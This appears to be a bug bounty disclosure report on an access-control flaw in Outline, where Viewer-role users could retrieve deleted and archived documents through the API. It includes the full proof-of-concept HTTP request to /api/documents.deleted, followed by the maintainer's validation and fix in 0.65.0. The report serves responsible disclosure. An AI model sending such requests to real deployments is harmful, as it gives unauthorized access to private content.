Documents in trash accessible by Viewer role in outline/outline


Reported on

Jul 3rd 2022


Once a document is archived or deletec, there is no way to access it through the UI or the Document link. But, the API gives the file information and content. This is same with archived files.

Proof of Concept

  1. Give a user Viewer role.
  2. Visit or as a viewer (GUI doesn't have link to archive and trash pages and any archived or deleted document URL returns Not Found messages unless we open it via the gives URLs (/trash and /archive))
  3. or Send the following HTTP request with viewer's accessToken:
POST /api/documents.deleted HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 25
Cache-Control: no-cache
Pragma: no-cache
X-Editor-Version: 12.0.0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer <token>
Connection: close



Unauthorized access to deleted and archived documents and its contents

We are processing your report and will contact the outline team within 24 hours. a year ago
Niraj Khatiwada modified the report
a year ago
Niraj Khatiwada modified the report
a year ago
outline/outline maintainer has acknowledged this report a year ago
Tom Moor modified the Severity from High (7.1) to Medium (5.4) a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Tom Moor validated this vulnerability a year ago
Niraj Khatiwada has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor
a year ago


Fix ix in progress

Niraj Khatiwada
a year ago


Thank you very much :-)

Tom Moor marked this as fixed in 0.65.0 with commit 831df6 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
documents.tsx#L23-L45 has been validated
documents.ts#L209 has been validated
documents.ts#L165 has been validated
to join this conversation